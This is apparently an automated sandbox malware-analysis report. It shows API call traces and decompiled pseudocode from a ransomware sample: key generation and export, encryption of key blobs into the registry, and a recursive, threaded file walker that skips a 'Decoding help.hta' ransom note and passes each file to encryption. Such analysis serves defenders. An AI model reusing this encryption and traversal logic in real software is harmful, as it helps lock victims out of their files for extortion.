    • RegSetValueExA.ADVAPI32(?,00403A4F,00000000,00000001,00403A56,00000000,00403A56,80000002,004039AF,00000000,000F013F,?,00403A79,?,00000000,00000000), ref: 00401810
    • lstrlenA.KERNEL32(00403A79,?,00403A4F,00000000,00000001,00403A56,00000000,00403A56,80000002,004039AF,00000000,000F013F,?,00403A79,?,00000000), ref: 0040181A
    • RegSetValueExA.ADVAPI32(?,00403A6D,00000000,00000001,00403A79,00000000,00403A79,?,00403A4F,00000000,00000001,00403A56,00000000,00403A56,80000002,004039AF), ref: 00401831
    • RegCloseKey.ADVAPI32(?,?,00403A6D,00000000,00000001,00403A79,00000000,00403A79,?,00403A4F,00000000,00000001,00403A56,00000000,00403A56,80000002), ref: 00401839
    • CopyFileA.KERNEL32(?,00403A79,00000000), ref: 00401848
    • RegOpenKeyExA.ADVAPI32(80000002,0040397B,00000000,000F013F,?,00403A79,?,00000000,00000000,00008000,00008000), ref: 00401862
    • RegQueryValueExA.ADVAPI32(?,004037E8,00000000,00000000,004045E0,00000114,80000002,0040397B,00000000,000F013F,?,00403A79,?,00000000,00000000,00008000), ref: 00401883
    • RegQueryValueExA.ADVAPI32(?,004037E9,00000000,00000000,004040E0,00000500,?,004037E8,00000000,00000000,004045E0,00000114,80000002,0040397B,00000000,000F013F), ref: 004018B1
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114,80000002,0040397B,00000000,000F013F,?), ref: 004018D7
    • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114,80000002,0040397B,00000000,000F013F,?), ref: 004018E0
    • GetEnvironmentVariableA.KERNEL32(0040380F,?,000005DC,?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,?,004037E8,00000000), ref: 004018F9
    • ShellExecuteA.SHELL32(00000000,00000000,?,004038E1,00000000,00000000), ref: 0040190E
    • Sleep.KERNEL32(00000064,00000000,00000000,?,004038E1,00000000,00000000,0040380F,?,000005DC,?,00000000,00000000,00000001,00000008,?), ref: 00401915
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114), ref: 00401931
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114,80000002), ref: 00401946
    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?), ref: 00401962
    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?), ref: 00401980
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001), ref: 00401988
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?), ref: 00401992
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000), ref: 004019A6
    • CryptImportKey.ADVAPI32(?,00403FBF,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000), ref: 004019C1
    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001), ref: 004019F9
    • CryptEncrypt.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A29
    • CryptDestroyKey.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A34
    • CryptReleaseContext.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF), ref: 00401A3E
    • RegSetValueExA.ADVAPI32(?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000), ref: 00401A59
    • RegSetValueExA.ADVAPI32(?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001), ref: 00401A74
    • RegCloseKey.ADVAPI32(?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000), ref: 00401A7C
    • RtlZeroMemory.KERNEL32(?,00008000,?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?), ref: 00401A89
    • RegOpenKeyExA.ADVAPI32(80000002,00403940,00000000,000F013F,?,?,00008000,?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8), ref: 00401AA3
    • RegSetValueExA.ADVAPI32(?,004039DE,00000000,00000004,?,00000004,80000002,00403940,00000000,000F013F,?,?,00008000,?,?,004037E9), ref: 00401AB9
    • RegSetValueExA.ADVAPI32(?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000,00000004,?,00000004,80000002,00403940,00000000,000F013F), ref: 00401ACF
    • RegSetValueExA.ADVAPI32(?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000,00000004), ref: 00401AE5
    • RegCloseKey.ADVAPI32(?,?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000), ref: 00401AED
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004), ref: 00401B01
    • CryptImportKey.ADVAPI32(?,004045E0,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000,00000004), ref: 00401B1C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Crypt$Value$Context$Acquire$CloseOpen$DestroyEncryptExportFileImportQueryReleaseSleeplstrlen$AllocCopyEnvironmentErrorExecuteGlobalLastMemoryModuleNameShellVariableZerolstrcmpi
    • String ID: hy:@
    • API String ID: 502290952-3615739078
    • Opcode ID: 067f5b85d839d909d261e6f5ecec44bc9520b5d9e95da1cec580265f3e11e12d
    • Instruction ID: 86879c33b08c28671aa86a1e658d7eba573c44414e10c71c68188b85a97574e0
    • Opcode Fuzzy Hash: 067f5b85d839d909d261e6f5ecec44bc9520b5d9e95da1cec580265f3e11e12d
    • Instruction Fuzzy Hash: 60D1C071B943097AEB21AA91CC43FDE7A79AB04B09F20413AF700790E1D7FD6A14966D
    Uniqueness

    Uniqueness Score: -1,00%

    Function 0040191C, Relevance: 69.3, APIs: 46, Instructions: 298encryptionregistrystringCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 55%
    			E0040191C() {
				void* _t138;
				void* _t144;
				char* _t147;
				CHAR* _t148;
				void* _t149;
				void* _t153;
				void* _t154;

				_push(_t153 - 0x1c);
				_push(0x8000001);
				_push(1);
				_push( *(_t153 - 0x28));
				L00401F86(); // executed
				 *(_t153 - 0x2c) = 0x494;
				_push(_t153 - 0x2c);
				_push( *(_t153 - 0x24));
				_push(0);
				_push(7);
				_push(0);
				_push( *(_t153 - 0x1c));
				L00401F80(); // executed
				 *(_t153 - 0x2c) = 0x114;
				_push(_t153 - 0x2c);
				_push(0x4045e0);
				_push(0);
				_push(6);
				_push(0);
				_push( *(_t153 - 0x1c));
				L00401F80();
				CryptDestroyKey( *(_t153 - 0x1c));
				CryptReleaseContext( *(_t153 - 0x28), 0);
				CryptAcquireContextA(_t153 - 0x28, 0, 0, 1, 0xf0000000); // executed
				CryptImportKey( *(_t153 - 0x28), 0x403fbf, 0x114, 0, 0, 0x403abb);
				 *(_t153 - 0x34) = 4;
				_t149 =  *(_t153 - 0x24);
				_t138 = 0x4040e0;
				do {
					 *(_t153 - 0x2c) = 0xf4;
					asm("cld");
					memcpy(_t138, _t149, 0xf4);
					_t154 = _t154 + 0xc;
					_push(0x500);
					_push(_t153 - 0x2c);
					_push(_t138);
					_push(0);
					_push(0);
					_push(0);
					_push( *0x403abb); // executed
					L00401F7A(); // executed
					_t138 = _t149 + 0x1f4;
					_t18 = _t153 - 0x34;
					 *_t18 =  *(_t153 - 0x34) - 1;
				} while ( *_t18 != 0);
				 *(_t153 - 0x2c) = 0xc4;
				asm("cld");
				memcpy(_t138, _t149, 0xc4);
				_push(0x500);
				_push(_t153 - 0x2c);
				_push(_t138);
				_push(0);
				_push(1);
				_push(0);
				_push( *0x403abb); // executed
				L00401F7A(); // executed
				CryptDestroyKey( *0x403abb); // executed
				CryptReleaseContext( *(_t153 - 0x28), "true");
				RegSetValueExA( *(_t153 - 0x20), 0x4037e8, 0, 3, 0x4045e0, 0x114);
				RegSetValueExA( *(_t153 - 0x20), 0x4037e9, 0, 3, 0x4040e0, 0x500);
				RegCloseKey( *(_t153 - 0x20));
				_push(0x8000);
				_push( *(_t153 - 0x24));
				L00401EF6();
				RegOpenKeyExA(0x80000002, 0x403940, 0, 0xf013f, _t153 - 0x20); // executed
				RegSetValueExA( *(_t153 - 0x20), 0x4039de, 0, 4,  *(_t153 - 0x24), 4);
				RegSetValueExA( *(_t153 - 0x20), 0x4039f4, 0, 4,  *(_t153 - 0x24), 4);
				RegSetValueExA( *(_t153 - 0x20), 0x4039fe, 0, 4,  *(_t153 - 0x24), 4);
				RegCloseKey( *(_t153 - 0x20));
				CryptAcquireContextA(_t153 - 0x28, 0, 0, 1, 0xf0000000); // executed
				CryptImportKey( *(_t153 - 0x28), 0x4045e0, 0x114, 0, 0, 0x403abb);
				 *(_t153 - 0x34) = 0x4035b5;
				 *(_t153 - 0x34) =  *(_t153 - 0x34) - 5;
				_push(4);
				asm("lodsd");
				asm("bswap edx");
				asm("xlatb");
				asm("stosb");
				asm("rol edx, 0x6");
				asm("loop 0xfffffff5");
				asm("loop 0xffffffe6");
				 *0x004035B4 = 0x33;
				GetSystemTimeAsFileTime(_t153 - 0x18);
				 *((intOrPtr*)(_t153 - 0x14)) =  *((intOrPtr*)(_t153 - 0x14)) + 0x258;
				FileTimeToSystemTime(_t153 - 0x18, _t153 - 0x10);
				GetDateFormatA(0, 0, _t153 - 0x10, 0x403804, 0x403449, 0xa);
				 *0x403ab3 = lstrlenA(0x403006);
				MultiByteToWideChar(3, 0,  *(_t153 - 0x34), 0xffffffff, 0x4046f4, 0x19);
				 *0x4046f4 = 0x2e;
				_t144 =  *(_t153 - 0x24);
				asm("cld");
				memcpy(_t144,  *(_t153 - 0x34), 0x19);
				_t147 = _t144;
				 *_t147 = 0x2e;
				lstrcatA(_t147, 0x4037d4);
				RegCreateKeyA(0x80000000, _t147, _t153 - 0x20); // executed
				_t148 =  &(_t147[0x200]);
				lstrcatA(_t148, 0x403a94);
				lstrcatA(_t148, 0x403a56);
				RegSetValueExA( *(_t153 - 0x20), 0x403003, 0, 1, _t148, lstrlenA(_t148));
				RegCloseKey( *(_t153 - 0x20));
				SHChangeNotify(0x8000000, 0, 0, 0); // executed
				GetEnvironmentVariableA(0x40380f,  *(_t153 - 0x24), 0x5dc); // executed
				ShellExecuteA(0, 0,  *(_t153 - 0x24), 0x4038c1, 0, 0); // executed
				GlobalFree( *(_t153 - 0x24)); // executed
				SetErrorMode(1); // executed
				E00401DE7(0x403a2a, 0); // executed
				E00401DE7(0x403a3c, 0); // executed
				while(1) {
					E004016FF(); // executed
					while(1) {
						Sleep(0x7530); // executed
						if( *0x403ab7 == 0) {
							break;
						}
					}
					Sleep(0x1388);
					if( *((intOrPtr*)(_t153 - 0x38)) == 0) {
						 *((intOrPtr*)(_t153 - 0x38)) =  *((intOrPtr*)(_t153 - 0x38)) + 1;
						ShellExecuteA(0, 0x40393b, 0x403a56, 0, 0, 5);
					}
					 *(_t153 - 0x28) = CreateFileA(0x4037ed, 0xc0000000, 0, 0, 4, 0, 0);
					WriteFile( *(_t153 - 0x28), 0x403817, 0xaa, _t153 - 0x34, 0);
					CloseHandle( *(_t153 - 0x28));
					ShellExecuteA(0, 0x40393b, 0x4037ed, 0, 0, 0);
				}
			}










    0x0040193b
    0x0040193c
    0x00401941
    0x00401943
    0x00401946
    0x0040194b
    0x00401955
    0x00401956
    0x00401959
    0x0040195b
    0x0040195d
    0x0040195f
    0x00401962
    0x00401967
    0x00401971
    0x00401972
    0x00401977
    0x00401979
    0x0040197b
    0x0040197d
    0x00401980
    0x00401988
    0x00401992
    0x004019a6
    0x004019c1
    0x004019c6
    0x004019cd
    0x004019d0
    0x004019d6
    0x004019dd
    0x004019e0
    0x004019e1
    0x004019e1
    0x004019e3
    0x004019eb
    0x004019ec
    0x004019ed
    0x004019ef
    0x004019f1
    0x004019f3
    0x004019f9
    0x004019fe
    0x00401a01
    0x00401a01
    0x00401a01
    0x00401a0d
    0x00401a10
    0x00401a11
    0x00401a13
    0x00401a1b
    0x00401a1c
    0x00401a1d
    0x00401a1f
    0x00401a21
    0x00401a23
    0x00401a29
    0x00401a34
    0x00401a3e
    0x00401a59
    0x00401a74
    0x00401a7c
    0x00401a81
    0x00401a86
    0x00401a89
    0x00401aa3
    0x00401ab9
    0x00401acf
    0x00401ae5
    0x00401aed
    0x00401b01
    0x00401b1c
    0x00401b33
    0x00401b36
    0x00401b3f
    0x00401b40
    0x00401b43
    0x00401b50
    0x00401b51
    0x00401b52
    0x00401b55
    0x00401b59
    0x00401b5b
    0x00401b63
    0x00401b68
    0x00401b77
    0x00401b90
    0x00401b9f
    0x00401bb4
    0x00401bb9
    0x00401bc0
    0x00401bcc
    0x00401bcd
    0x00401bcf
    0x00401bd0
    0x00401bd9
    0x00401be8
    0x00401bed
    0x00401bf9
    0x00401c04
    0x00401c1d
    0x00401c25
    0x00401c35
    0x00401c47
    0x00401c5c
    0x00401c64
    0x00401c6b
    0x00401c77
    0x00401c83
    0x00401c88
    0x00401c88
    0x00401c8d
    0x00401c92
    0x00401c9e
    0x00000000
    0x00000000
    0x00401d26
    0x00401ca9
    0x00401cb2
    0x00401cb4
    0x00401cc9
    0x00401cc9
    0x00401ce7
    0x00401cfd
    0x00401d05
    0x00401d1c
    0x00401d1c

    APIs
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114,80000002), ref: 00401946
    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?), ref: 00401962
    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?), ref: 00401980
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001), ref: 00401988
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?), ref: 00401992
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000), ref: 004019A6
    • CryptImportKey.ADVAPI32(?,00403FBF,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000), ref: 004019C1
    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001), ref: 004019F9
    • CryptEncrypt.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A29
    • CryptDestroyKey.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A34
    • CryptReleaseContext.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF), ref: 00401A3E
    • RegSetValueExA.ADVAPI32(?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000), ref: 00401A59
    • RegSetValueExA.ADVAPI32(?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001), ref: 00401A74
    • RegCloseKey.ADVAPI32(?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000), ref: 00401A7C
    • RtlZeroMemory.KERNEL32(?,00008000,?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?), ref: 00401A89
    • RegOpenKeyExA.ADVAPI32(80000002,00403940,00000000,000F013F,?,?,00008000,?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8), ref: 00401AA3
    • RegSetValueExA.ADVAPI32(?,004039DE,00000000,00000004,?,00000004,80000002,00403940,00000000,000F013F,?,?,00008000,?,?,004037E9), ref: 00401AB9
    • RegSetValueExA.ADVAPI32(?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000,00000004,?,00000004,80000002,00403940,00000000,000F013F), ref: 00401ACF
    • RegSetValueExA.ADVAPI32(?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000,00000004), ref: 00401AE5
    • RegCloseKey.ADVAPI32(?,?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000), ref: 00401AED
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004), ref: 00401B01
    • CryptImportKey.ADVAPI32(?,004045E0,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000,00000004), ref: 00401B1C
    • GetSystemTimeAsFileTime.KERNEL32(?,?,004045E0,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000), ref: 00401B63
    • FileTimeToSystemTime.KERNEL32(?,?,?,?,004045E0,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,?), ref: 00401B77
    • GetDateFormatA.KERNEL32(00000000,00000000,?,00403804,00403449,0000000A,?,?,?,?,004045E0,00000114,00000000,00000000,00403ABB,?), ref: 00401B90
    • lstrlenA.KERNEL32(00403006,00000000,00000000,?,00403804,00403449,0000000A,?,?,?,?,004045E0,00000114,00000000,00000000,00403ABB), ref: 00401B9A
    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000,?,00403804,00403449,0000000A,?,?,?), ref: 00401BB4
    • lstrcatA.KERNEL32(?,004037D4,00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000,?,00403804,00403449,0000000A,?), ref: 00401BD9
    • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 00401BE8
    • lstrcatA.KERNEL32(?,00403A94,?,004037D4,00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000,?,00403804,00403449), ref: 00401BF9
    • lstrcatA.KERNEL32(?,00403A56,?,00403A94,?,004037D4,00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000,?), ref: 00401C04
    • lstrlenA.KERNEL32(?,?,00403A56,?,00403A94,?,004037D4,00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000), ref: 00401C0A
    • RegSetValueExA.ADVAPI32(?,00403003,00000000,00000001,?,00000000,?,?,00403A56,?,00403A94,?,004037D4,00000003,00000000,00000005), ref: 00401C1D
    • RegCloseKey.ADVAPI32(?,?,00403003,00000000,00000001,?,00000000,?,?,00403A56,?,00403A94,?,004037D4,00000003,00000000), ref: 00401C25
    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00401C35
    • GetEnvironmentVariableA.KERNEL32(0040380F,?,000005DC,?,?,00403003,00000000,00000001,?,00000000,?,?,00403A56,?,00403A94,?), ref: 00401C47
    • ShellExecuteA.SHELL32(00000000,00000000,?,004038C1,00000000,00000000), ref: 00401C5C
    • GlobalFree.KERNEL32 ref: 00401C64
    • SetErrorMode.KERNEL32(00000001,?,0040380F,?,000005DC,?,?,00403003,00000000,00000001,?,00000000,?,?,00403A56,?), ref: 00401C6B
    • Sleep.KERNEL32(00007530,00403A3C,00000000,00403A2A,00000000,00000001,?,0040380F,?,000005DC,?,?,00403003,00000000,00000001,?), ref: 00401C92
    • Sleep.KERNEL32(00001388,00007530,00007530,00403A3C,00000000,00403A2A,00000000,00000001,?,0040380F,?,000005DC,?,?,00403003,00000000), ref: 00401CA9
    • ShellExecuteA.SHELL32(00000000,0040393B,00403A56,00000000,00000000,00000005), ref: 00401CC9
    • CreateFileA.KERNEL32(004037ED,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530,00403A3C,00000000,00403A2A,00000000,00000001,?), ref: 00401CE2
    • WriteFile.KERNEL32(?,00403817,000000AA,00000005,00000000,004037ED,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530,00403A3C), ref: 00401CFD
    • CloseHandle.KERNEL32(?,?,00403817,000000AA,00000005,00000000,004037ED,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530), ref: 00401D05
    • ShellExecuteA.SHELL32(00000000,0040393B,004037ED,00000000,00000000,00000000), ref: 00401D1C
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Crypt$Value$CloseContextFileTime$ExecuteShelllstrcat$AcquireCreateDestroyEncryptExportImportReleaseSleepSystemlstrlen$ByteChangeCharDateEnvironmentErrorFormatFreeGlobalHandleMemoryModeMultiNotifyOpenVariableWideWriteZero
    • String ID:
    • API String ID: 204179998-0
    • Opcode ID: bab4de6a3842e2200fc4419f95baa4f4f36254ee96687c4dd4c72e7aacfdb836
    • Instruction ID: 1140f1e6a0d84ce1b2bbf66032a6f78f9ab0211b56a4c443091a9b8f8d6dd5e8
    • Opcode Fuzzy Hash: bab4de6a3842e2200fc4419f95baa4f4f36254ee96687c4dd4c72e7aacfdb836
    • Instruction Fuzzy Hash: 40A1D271B843097AEB21AB91CC43FDD7A79AB44B19F20403AF700790F1D7F96A149A6D
    Uniqueness

    Uniqueness Score: -1,00%

    Function 004014CC, Relevance: 52.6, APIs: 24, Strings: 6, Instructions: 146stringfilesleepCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E004014CC(WCHAR* _a4) {
				void* _v8;
				void* _v12;
				struct _WIN32_FIND_DATAW _v604;
				struct _MEMORYSTATUS _v636;
				void* _t47;
				void* _t48;
				signed int _t59;
				WCHAR* _t83;
				WCHAR* _t94;
				WCHAR* _t98;
				WCHAR* _t99;
				void* _t101;
				void* _t102;

				_t47 = FindFirstFileW(_a4,  &_v604) + 1;
				if(_t47 == 0) {
					L22:
					_t48 = GlobalFree(_a4); // executed
					 *0x403ab7 =  *0x403ab7 - 1;
					return _t48;
				} else {
					_v12 = _t47 - 1;
					do {
						if((_v604.dwFileAttributes & 0x00000010) == 0) {
							E00401096(_a4);
							if(_v604.nFileSizeHigh != 0 || _v604.nFileSizeLow >= 0x20) {
								_t94 =  &(_v604.cFileName);
								if(lstrcmpiW(L"Decoding help.hta", _t94) != 0) {
									_t59 = lstrlenW(_t94);
									if(_t59 <= 0x19 || lstrcmpiW(0x40471e, _t101 + _t59 * 2 - 0x234) != 0) {
										_t100 = _a4;
										lstrcatW(_t100 + 0x8020, _a4);
										 *(_t100 + 0x801a + lstrlenW(_t100 + 0x8020) * 2) = 0;
										lstrcatW(_t100 + 0x8020,  &(_v604.cFileName));
										lstrcatW(_t100 + 0x10040, _t100 + 0x8020);
										lstrcatW(_t100 + 0x10040, 0x4046f4);
										if((_v604.dwFileAttributes & 0x00000001) != 0) {
											_t100 = _a4;
											SetFileAttributesW( &(_a4[0x4010]), 0x80);
										}
										E0040128D(_t100 + 0x8020,  &_v604);
									}
								}
							}
							goto L20;
						}
						_t98 =  &(_v604.cFileName);
						if(lstrcmpW(0x403002, _t98) != 0 && lstrcmpW(0x403000, _t98) != 0 && lstrcmpiW(L"windows", _t98) != 0) {
							_t83 = E00401781(0x18060);
							_t99 = _t83;
							_v8 = _t83;
							lstrcatW(_t99, _a4);
							 *((char*)(_t99 + lstrlenW(_t99) * 2 - 6)) = 0;
							lstrcatW(_t99, _t98);
							lstrcatW(_t99, L"\\*.*");
							while( *0x403ab7 > 0x64) {
								_v636.dwLength = 0x20;
								GlobalMemoryStatus( &_v636);
								if(_v636.dwMemoryLoad <= 0x46) {
									break;
								}
								Sleep(0x64);
							}
							 *0x403ab7 =  *0x403ab7 + 1;
							CloseHandle(CreateThread(0, 0x10000, E004014CC, _v8, 0, 0));
						}
						L20:
						asm("cld");
						memset( &(_a4[0x4010]), 0, 0x4010 << 2);
						_t102 = _t102 + 0xc;
					} while (FindNextFileW(_v12,  &_v604) != 0);
					FindClose(_v12);
					goto L22;
				}
			}
















    0x004014e4
    0x004014e5
    0x004016ed
    0x004016f0
    0x004016f5
    0x004016fc
    0x004014eb
    0x004014ec
    0x004014ef
    0x004014f8
    0x004015cf
    0x004015db
    0x004015eb
    0x004015fe
    0x00401605
    0x0040160d
    0x00401629
    0x00401636
    0x00401647
    0x00401660
    0x00401673
    0x00401684
    0x00401692
    0x00401694
    0x004016a3
    0x004016a3
    0x004016b6
    0x004016b6
    0x0040160d
    0x004015fe
    0x00000000
    0x004015db
    0x004014fe
    0x00401511
    0x00401542
    0x00401547
    0x00401549
    0x00401550
    0x0040155b
    0x00401562
    0x0040156d
    0x00401572
    0x0040157b
    0x0040158c
    0x00401598
    0x00000000
    0x00000000
    0x0040159c
    0x0040159c
    0x004015a3
    0x004015c2
    0x004015c2
    0x004016bb
    0x004016cb
    0x004016cc
    0x004016cc
    0x004016dd
    0x004016e8
    0x00000000
    0x004016e8

    APIs
    • FindFirstFileW.KERNEL32(?,?), ref: 004014DF
    • lstrcmpW.KERNEL32(00403002,?,?,?), ref: 0040150A
    • lstrcmpW.KERNEL32(00403000,?,00403002,?,?,?), ref: 0040151D
    • lstrcmpiW.KERNEL32(windows,?,00403000,?,00403002,?,?,?), ref: 00401530
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • lstrcatW.KERNEL32(00000000,?), ref: 00401550
    • lstrlenW.KERNEL32(00000000,00000000,?,00018060,windows,?,00403000,?,00403002,?,?,?), ref: 00401556
    • lstrcatW.KERNEL32(00000000,?), ref: 00401562
    • lstrcatW.KERNEL32(00000000,\*.*), ref: 0040156D
    • GlobalMemoryStatus.KERNEL32 ref: 0040158C
    • Sleep.KERNEL32(00000064,00000020), ref: 0040159C
    • CreateThread.KERNEL32 ref: 004015BC
    • CloseHandle.KERNEL32(00000000,00000000,00010000,004014CC,?,00000000,00000000,00000000,\*.*,00000000,?,00000000,00000000,?,00018060,windows), ref: 004015C2
    • lstrcmpiW.KERNEL32(Decoding help.hta,?), ref: 004015F7
    • lstrlenW.KERNEL32(?,Decoding help.hta,?), ref: 00401605
    • lstrcmpiW.KERNEL32(0040471E,?,?,Decoding help.hta,?), ref: 0040161C
    • lstrcatW.KERNEL32(?,?), ref: 00401636
    • lstrlenW.KERNEL32(?,?,?,?,Decoding help.hta,?), ref: 00401642
    • lstrcatW.KERNEL32(?,?), ref: 00401660
    • lstrcatW.KERNEL32(?,?), ref: 00401673
    • lstrcatW.KERNEL32(?,004046F4), ref: 00401684
    • SetFileAttributesW.KERNEL32(?,00000080,?,004046F4,?,?,?,?), ref: 004016A3
    • FindNextFileW.KERNEL32(?,?,Decoding help.hta,?), ref: 004016D8
    • FindClose.KERNEL32(?,?,?,Decoding help.hta,?), ref: 004016E8
    • GlobalFree.KERNEL32 ref: 004016F0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: lstrcat$FileFindGloballstrcmpilstrlen$CloseSleeplstrcmp$AllocAttributesCreateFirstFreeHandleMemoryNextStatusThread
